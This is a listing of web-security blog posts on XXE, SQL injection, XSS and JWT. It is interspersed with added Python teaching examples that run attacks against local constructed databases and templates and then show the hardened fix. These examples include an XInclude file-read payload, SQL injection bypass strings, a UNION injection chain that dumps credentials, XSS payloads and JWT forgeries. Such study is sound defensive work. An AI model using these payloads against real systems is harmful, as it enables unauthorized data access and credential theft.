Arnab Das (dasarnab.hashnode.dev), Apr 18, 2024
Comprehensive Guide to Web Security Best Practices: Preventing Common Attacks
Introduction: In today's interconnected digital landscape, web security stands as a paramount concern for businesses, organizations, and individuals alike. The ever-evolving nature of cyber threats presents a constant challenge, making it imperative t...
Tag: #cybersecurity
Nabidul Islam (nabidul.hashnode.dev), Apr 17, 2024
Updating APIs with HTTP Methods & JSON Patch
What are HTTP Methods? HTTP (HyperText Transfer Protocol) methods are the request verbs that let APIs (Application Programming Interfaces) perform CRUD (Create, Read, Update, Delete) operations. Common HTTP Methods: POST - The POST method is use...
Tag: httpmethods
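The JSON Patch side of that post (RFC 6902 operations addressed by RFC 6901 JSON Pointers) is worth seeing as working code, because two details matter for security: the patch has to apply atomically, and the server has to decide which paths a caller is allowed to write. The following is an added example, not code from the post; the user record, the patch and the `allowed_prefixes` write allowlist are constructed for illustration, and whole-document (empty pointer) operations are deliberately left unsupported.

```python
import copy
from typing import Any, Dict, List, Optional, Sequence


def parse_pointer(path: str) -> List[str]:
    """RFC 6901 JSON Pointer -> reference tokens. Unescape ~1 first, then ~0 (order matters)."""
    if path == "":
        raise ValueError("whole-document operations are not supported in this example")
    if not path.startswith("/"):
        raise ValueError(f"invalid JSON Pointer: {path!r}")
    return [t.replace("~1", "/").replace("~0", "~") for t in path.split("/")[1:]]


def _locate(doc: Any, tokens: List[str]):
    """Walk to the parent container; array indices become ints and '-' means 'append'."""
    parent = doc
    for tok in tokens[:-1]:
        parent = parent[int(tok)] if isinstance(parent, list) else parent[tok]
    key = tokens[-1]
    if isinstance(parent, list):
        key = len(parent) if key == "-" else int(key)
    return parent, key


def _writable(path: str, allowed: Optional[Sequence[str]]) -> bool:
    """A path is writable if no allowlist is set or it sits under one of the allowed prefixes."""
    return allowed is None or any(path == p or path.startswith(p + "/") for p in allowed)


def apply_patch(document: Any, patch: List[Dict[str, Any]],
                allowed_prefixes: Optional[Sequence[str]] = None) -> Any:
    """Apply an RFC 6902 patch atomically: work on a deep copy and return it, so a failing
    op leaves the caller's document untouched. 'test' ops are reads; every other op must
    target (and, for 'move', originate from) a writable path."""
    doc = copy.deepcopy(document)
    for op in patch:
        kind, path = op["op"], op["path"]
        if kind != "test" and not _writable(path, allowed_prefixes):
            raise PermissionError(f"{kind} on {path!r} is outside the writable paths")
        if kind in ("move", "copy"):
            src = op["from"]
            if kind == "move" and not _writable(src, allowed_prefixes):
                raise PermissionError(f"move from {src!r} is outside the writable paths")
            src_parent, src_key = _locate(doc, parse_pointer(src))
            value = copy.deepcopy(src_parent[src_key])
            if kind == "move":
                del src_parent[src_key]
        elif kind in ("add", "replace", "test"):
            value = op["value"]
        parent, key = _locate(doc, parse_pointer(path))
        if kind in ("add", "move", "copy"):
            if isinstance(parent, list):
                parent.insert(key, value)
            else:
                parent[key] = value
        elif kind == "replace":
            if isinstance(parent, dict) and key not in parent:
                raise KeyError(f"replace target does not exist: {path}")
            parent[key] = value  # a missing array index raises IndexError here
        elif kind == "remove":
            del parent[key]
        elif kind == "test":
            if parent[key] != value:
                raise ValueError(f"test failed at {path}: precondition no longer holds")
        else:
            raise ValueError(f"unknown op {kind!r}")
    return doc


def patch_outcome(document: Any, patch: List[Dict[str, Any]],
                  allowed: Optional[Sequence[str]] = None) -> str:
    """Return 'ok' or the name of the exception a patch raised (used to show rejected patches)."""
    try:
        apply_patch(document, patch, allowed)
        return "ok"
    except (PermissionError, KeyError, ValueError, IndexError) as exc:
        return type(exc).__name__


# Constructed sample: a user record and a self-service patch guarded by a 'test' precondition.
USER = {"name": "alice", "role": "user", "tags": ["a", "b"]}
PATCH = [
    {"op": "test", "path": "/role", "value": "user"},     # abort if the role changed concurrently
    {"op": "replace", "path": "/name", "value": "alice2"},
    {"op": "add", "path": "/tags/-", "value": "c"},
    {"op": "remove", "path": "/tags/0"},
]
WRITABLE = ("/name", "/tags")   # hypothetical API rule: a user may never patch their own /role


def demo() -> dict:
    return apply_patch(USER, PATCH, WRITABLE)
```

`demo()` returns the updated record while `USER` is unchanged; `patch_outcome(USER, [{"op": "replace", "path": "/role", "value": "admin"}], WRITABLE)` reports `PermissionError`, which is the check a real endpoint must make before honouring a PATCH body.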
Joel O. (joelodey.hashnode.dev), Apr 16, 2024
Lab: Exploiting XInclude to retrieve files
Lab scenario: Our mission is to exploit XInclude through a web application's "Check stock" feature. By intercepting and manipulating a POST request, we intend to use XInclude to retrieve files from the server. Let's proceed with the solution: Interc...
Series: PortSwigger XML external entity (XXE) injection · Tag: xxe
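The mechanism behind that lab is that the application copies a POST field into an XML document and then expands XInclude when parsing it; because the attacker does not control the DOCTYPE, a classic external entity is unavailable, but an injected `xi:include` element with `parse="text"` pulls a file in as text. The following is an added example, not the lab write-up's code: it simulates the application with Python's standard library (`xml.etree.ElementInclude`, whose default loader opens any `href` on disk), uses a temporary file with constructed contents in place of a real server file, and the `stockCheck`/`productId` message layout is assumed.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import escape

XI_NS = "http://www.w3.org/2001/XInclude"


def build_stock_request(product_id: str, store_id: str = "1") -> str:
    """Hypothetical backend message with the POST field concatenated straight into XML (the flaw)."""
    return f"<stockCheck><productId>{product_id}</productId><storeId>{store_id}</storeId></stockCheck>"


def build_stock_request_safe(product_id: str, store_id: str = "1") -> str:
    """Same message with untrusted values XML-escaped, so '<' in them can never become markup."""
    return (f"<stockCheck><productId>{escape(product_id)}</productId>"
            f"<storeId>{escape(store_id)}</storeId></stockCheck>")


def backend_vulnerable(xml_text: str) -> str:
    """Parses the request, then expands XInclude with the default loader, which reads any href on disk."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)
    return "".join(root.find("productId").itertext())


def backend_hardened(xml_text: str) -> str:
    """Never expands XInclude and rejects documents that carry an xi:include element at all."""
    root = ET.fromstring(xml_text)
    if root.find(f".//{{{XI_NS}}}include") is not None:
        raise ValueError("XInclude is not permitted in stock-check requests")
    return "".join(root.find("productId").itertext())


def xinclude_payload(path: str) -> str:
    """The lab's technique: declare the xi namespace on an injected element and include a file as text."""
    return f'<foo xmlns:xi="{XI_NS}"><xi:include parse="text" href="{path}"/></foo>'


def run_demo() -> dict:
    """Run the attack against both backends and report what each returned."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"   # constructed stand-in for a server file
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
        handle.write(secret)
        path = handle.name
    try:
        payload = xinclude_payload(path)
        leaked = backend_vulnerable(build_stock_request(payload))
        try:
            backend_hardened(build_stock_request(payload))
            blocked = False
        except ValueError:
            blocked = True
        # With escaping, the payload survives only as literal text and round-trips unchanged.
        escaped = backend_hardened(build_stock_request_safe(payload))
    finally:
        os.unlink(path)
    return {"secret": secret, "payload": payload, "leaked": leaked,
            "blocked_by_hardened_parser": blocked, "escaped_input_roundtrip": escaped}
```

`run_demo()["leaked"]` equals the file contents on the vulnerable path, which is what the lab's response echoes back. Note that `xml.etree` never expands XInclude on its own; the bug is the application calling `ElementInclude.include` (or the equivalent in another library) on a document built from user input, and the fix is both to stop doing that and to escape the value when building the XML.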
0xshin (0xshin.hashnode.dev), Apr 14, 2024
SQLi Series - Basic Bypassing Techniques - 02
1. Introduction: Now that we have a basic understanding of how SQL statements work, let's dive into SQL injection. Before executing entire SQL queries, we will learn how to modify the original query by injecting the OR operator and using SQL comments ...
Series: CPTS Journey · Tag: #sqlinjection
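To make the OR-operator and comment rewrites concrete, here is an added example (not code from the series) that builds the vulnerable login query by string concatenation, applies the three classic payload shapes, and shows the parameterized query that defeats all of them. The database is an in-memory SQLite table with constructed credentials; `sqlite3` is used only because it runs anywhere, and the comment syntax note below covers the other engines.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES
            ('administrator', 'constructed-admin-pw'),
            ('wiener', 'peter');
    """)
    return con


def vulnerable_query(username: str, password: str) -> str:
    """The original query with both fields concatenated in: this is what the payloads rewrite."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    row = con.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same logic with placeholders: values travel separately from the SQL text, so quotes,
    OR and -- arrive as data and the query structure cannot change."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Constructed payloads for the rewrites the series describes.
COMMENT_OUT = "administrator'--"   # close the string, comment out the password check
OR_TRUE = "' OR 1=1--"             # always-true condition, rest of the WHERE discarded
OR_NO_COMMENT = "' OR '1'='1"      # no comment: works only where it lands in the last condition


def run_demo() -> dict:
    """Which username each payload logs in as on the vulnerable and the parameterized query."""
    con = make_db()
    return {
        "comment_out": login_vulnerable(con, COMMENT_OUT, "wrong"),
        "or_true": login_vulnerable(con, OR_TRUE, "wrong"),
        # AND binds tighter than OR: '' OR ('1'='1' AND password='wrong') is still false
        "or_no_comment_in_username": login_vulnerable(con, OR_NO_COMMENT, "wrong"),
        # in the password field the OR is the last condition, so (false) OR true wins
        "or_no_comment_in_password": login_vulnerable(con, "nobody", OR_NO_COMMENT),
        "parameterized_comment_out": login_parameterized(con, COMMENT_OUT, "wrong"),
        "parameterized_or_true": login_parameterized(con, OR_TRUE, "wrong"),
    }
```

`vulnerable_query(COMMENT_OUT, "wrong")` prints the rewritten statement, which is the quickest way to see why a payload works or fails. Comment syntax differs by engine: SQLite and PostgreSQL accept `--`, MySQL needs `-- ` with a trailing space (or `#`), and Oracle accepts `--` but has no `#`.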
Jeremiah Liscum (mrliscum.com), Apr 10, 2024
Subdomain Reconnaissance Made Easy
The information gathering phase of penetration testing is probably the most important part. This is where we build our understanding of the target, and get a general idea of how we may wish to attack. Subdomain reconnaissance is a critical skill to h...
Tag: Web Development
Joel O. (joelodey.hashnode.dev), Apr 8, 2024
Lab: SQL injection attack, listing the database contents on non-Oracle databases
In this educational guide, we will explore the practical application of Burp Suite to identify and exploit SQL injection vulnerabilities, highlighting the importance of robust security practices. Step 1: Intercepting and Modifying Requests with Burp ...
Series: PortSwigger SQL injection (SQLi) Labs · Tag: #sqlinjection
Joel O. (joelodey.hashnode.dev), Apr 1, 2024
Lab: SQL injection UNION attack, retrieving data from other tables
In this educational guide, we will walk through the process of using Burp Suite to intercept and modify requests, focusing on the product category filter. Our objective is to unveil potential SQL injection vulnerabilities, understand the database str...
Series: PortSwigger SQL injection (SQLi) Labs · Tag: SQLi
Kshitij Kakade (kshitijkakade.hashnode.dev), Apr 1, 2024
Understanding and Mitigating XSS Attacks in Web Applications
Cross-site scripting (XSS) is a menacing threat to web application security, allowing attackers to inject malicious scripts into websites, potentially leading to data theft, session hijacking, and unauthorized activities. This blog post delves into t...
Tag: Front-end Security
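The mitigation that post leads to is output encoding chosen per context, and the point practitioners most often miss is that an attribute holding a URL needs validation on top of escaping. The following is an added example, not code from the post: a server-side template rendered two ways, with constructed payloads for the HTML text context and for an `href` attribute. The JavaScript context (data inside `<script>` or event handlers) is not covered here; it needs JSON encoding or data attributes rather than HTML escaping.

```python
import html
from urllib.parse import urlparse


def render_vulnerable(display_name: str, profile_url: str) -> str:
    """Untrusted values dropped straight into HTML text and into an href attribute."""
    return f'<p>Welcome, {display_name}</p><a href="{profile_url}">Your profile</a>'


def safe_link(url: str) -> str:
    """URL attribute context: escaping is not enough, the scheme must be allow-listed.
    javascript:, data: and vbscript: links execute without any '<' or '"' in the input."""
    url = url.strip()
    # Same-origin relative path; '//' and '/\\' would be scheme-relative (other host)
    if url.startswith("/") and not url.startswith(("//", "/\\")):
        return url
    scheme = urlparse(url).scheme.lower()
    if scheme in ("http", "https"):
        return url
    return "#"   # neutralise anything else rather than trying to fix it


def render_hardened(display_name: str, profile_url: str) -> str:
    """Escape for the text context; validate, then escape, for the attribute context."""
    return (f'<p>Welcome, {html.escape(display_name)}</p>'
            f'<a href="{html.escape(safe_link(profile_url))}">Your profile</a>')


def contains_active_markup(rendered: str) -> bool:
    """Demo check: does the output still carry a tag or a script-scheme link as markup?
    Escaped text ('&lt;script&gt;') does not match; a real tag does."""
    lowered = rendered.lower()
    return "<script" in lowered or "<img" in lowered or 'href="javascript:' in lowered


# Constructed attacker input for both contexts.
NAME_PAYLOAD = "<script>alert(document.cookie)</script>"
LINK_PAYLOAD = "javascript:alert(1)"


def run_demo() -> dict:
    return {
        "vulnerable": render_vulnerable(NAME_PAYLOAD, LINK_PAYLOAD),
        "hardened": render_hardened(NAME_PAYLOAD, LINK_PAYLOAD),
    }
```

`run_demo()["vulnerable"]` contains a live `<script>` tag and a `javascript:` link; the hardened rendering shows the name as inert text and replaces the link with `#`. Because `safe_link` allow-lists schemes instead of blocking known-bad ones, mixed-case (`JaVaScRiPt:`) and entity-encoded variants are rejected as well.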
SANKALP HARITASH (sankalp-haritash.hashnode.dev), Mar 29, 2024
Enhancing Web Security: Understanding OAuth, OpenID Connect, SAML, JWT, and MFA
Authentication and Authorization are critical components of modern web security, ensuring that users are who they claim to be and that they have permission to access specific resources. OAuth, OpenID Connect, SAML, JWT, and Multi-factor Authenticatio...
Tag: System Design
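Of the mechanisms in that overview, JWT is the one whose security depends most on how the verifier is written, so here is an added example (not code from the post) that issues and verifies an HS256 token with only the standard library and then tries the two forgeries every verifier has to reject: an `alg: none` header and a rewritten payload with the old signature. The key and claims are constructed; a production service would use a library, but the checks shown (algorithm pinned by the verifier, constant-time comparison, expiry enforced) are the ones to look for in whatever library is used.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url_encode(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact JWT: base64url(header).base64url(claims).base64url(HMAC-SHA256)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(claims)
    tag = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(tag)


def verify_hs256(token: str, key: bytes, now: float = None) -> dict:
    """Verify the way a resource server should: the verifier decides the algorithm,
    compares the tag in constant time, and checks exp before any claim is trusted."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h64, p64, s64 = parts
    header = json.loads(_b64url_decode(h64))
    # The header is attacker-controlled. Pinning the algorithm rejects alg=none and
    # blocks HS256/RS256 confusion, where a public key gets used as the HMAC secret.
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h64}.{p64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s64)):
        raise ValueError("signature check failed")
    claims = json.loads(_b64url_decode(p64))
    now = time.time() if now is None else now
    if "exp" not in claims or now >= claims["exp"]:
        raise ValueError("token expired or carries no exp")
    return claims


def forge_alg_none(token: str) -> str:
    """Attacker's attempt: swap the header for alg=none and drop the signature."""
    _, p64, _ = token.split(".")
    return _segment({"alg": "none", "typ": "JWT"}) + "." + p64 + "."


def forge_claims(token: str, new_claims: dict) -> str:
    """Attacker's attempt: rewrite the payload and keep the original signature."""
    h64, _, s64 = token.split(".")
    return h64 + "." + _segment(new_claims) + "." + s64


def rejects(token: str, key: bytes, now: float) -> bool:
    """True if the verifier refuses the token (used by the checks below)."""
    try:
        verify_hs256(token, key, now)
        return False
    except ValueError:
        return True


# Constructed demo material; never reuse a literal key like this in real code.
DEMO_KEY = b"constructed-demo-key-not-for-production"
DEMO_CLAIMS = {"sub": "alice", "role": "user", "exp": 2_000_000_000}
DEMO_NOW = 1_700_000_000
```

`verify_hs256(sign_hs256(DEMO_CLAIMS, DEMO_KEY), DEMO_KEY, DEMO_NOW)` returns the claims; both forgeries, a wrong key and a time past `exp` are rejected. Audience (`aud`) and issuer (`iss`) checks belong in the same function in a real deployment and are omitted here only to keep the example focused on the signature.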
Joel O. (joelodey.hashnode.dev), Mar 25, 2024
Lab: SQL injection attack, querying the database type and version on Oracle
To exploit SQL injection, it's crucial to understand the structure of the database query. Use a payload to determine the number of columns returned by the query and identify columns containing text data. For instance, inject the following payload int...
Series: PortSwigger SQL injection (SQLi) Labs · Tag: #sqlinjection
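The three UNION-based labs in this listing (listing database contents on non-Oracle databases, retrieving data from other tables, and querying the version) share one procedure: find the column count, put useful expressions into the matching slots, then read catalogue tables and finally the credentials table. The following is an added example serving all three, not code from the write-ups: the shop database is an in-memory SQLite stand-in with a constructed products table and a constructed `users_abcdef` table, `sqlite_master` plays the role of `information_schema.tables`, and `sqlite_version()` stands in for Oracle's `v$version`. Because SQLite does not type-check columns, the labs' separate "which columns hold text" probe is not reproduced; on Oracle or PostgreSQL it is needed before the string-returning steps.

```python
import sqlite3
from typing import Callable, List, Optional

Query = Callable[[str], List[tuple]]


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's shop database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, price REAL);
        INSERT INTO products VALUES ('Mug', 'Gifts', 9.5), ('Pen', 'Gifts', 1.0), ('Lamp', 'Home', 30.0);
        CREATE TABLE users_abcdef (username TEXT, password TEXT);
        INSERT INTO users_abcdef VALUES ('administrator', 'constructed-admin-pw'), ('wiener', 'peter');
    """)
    return con


def filter_vulnerable(con: sqlite3.Connection, category: str) -> List[tuple]:
    """The product category filter with the parameter concatenated into the WHERE clause."""
    sql = f"SELECT name, category, price FROM products WHERE category = '{category}'"
    return con.execute(sql).fetchall()


def filter_parameterized(con: sqlite3.Connection, category: str) -> List[tuple]:
    """Same filter with a bound parameter: the injected text is compared as a literal category."""
    return con.execute("SELECT name, category, price FROM products WHERE category = ?",
                       (category,)).fetchall()


def probe_column_count(query: Query, max_cols: int = 10) -> Optional[int]:
    """Step 1: ' UNION SELECT NULL,NULL,...-- with a growing NULL list. The count is right
    when the query stops erroring AND the injected all-NULL row actually comes back."""
    for n in range(1, max_cols + 1):
        payload = "x' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            rows = query(payload)
        except sqlite3.OperationalError:   # column-count mismatch between the two SELECTs
            continue
        if rows:
            return n
    return None


def union_select(query: Query, n: int, exprs: List[str], from_clause: str = "") -> List[tuple]:
    """Step 2: put the wanted expressions in the first slots and pad the rest with NULL.
    The 'x' category matches nothing, so only the UNION rows come back."""
    slots = exprs + ["NULL"] * (n - len(exprs))
    return query("x' UNION SELECT " + ",".join(slots) + " " + from_clause + "--")


def db_version(query: Query, n: int) -> str:
    """Oracle lab: SELECT banner FROM v$version (and every SELECT needs FROM dual).
    SQLite stand-in: sqlite_version()."""
    return union_select(query, n, ["sqlite_version()"])[0][0]


def list_tables(query: Query, n: int) -> List[str]:
    """Non-Oracle labs read information_schema.tables; SQLite's catalogue is sqlite_master."""
    rows = union_select(query, n, ["name"], "FROM sqlite_master WHERE type='table'")
    return sorted(r[0] for r in rows)


def dump_credentials(query: Query, n: int, table: str) -> dict:
    """Step 3: pull username and password out of the table found in the listing."""
    rows = union_select(query, n, ["username", "password"], f"FROM {table}")
    return {r[0]: r[1] for r in rows}


def run_attack(query: Query) -> dict:
    """Chain the steps against whatever filter function is passed in."""
    n = probe_column_count(query)
    if n is None:
        return {"columns": None}
    tables = list_tables(query, n)
    target = next((t for t in tables if t.startswith("users")), None)
    return {"columns": n, "version": db_version(query, n), "tables": tables,
            "credentials": dump_credentials(query, n, target) if target else {}}
```

Run against `filter_vulnerable` the chain reports three columns, both table names and the administrator's password; against `filter_parameterized` the probe never sees its NULL row come back and stops at the first step. On Oracle the same payloads need `FROM dual` after every injected SELECT, and on MySQL the comment must be `-- ` with a trailing space.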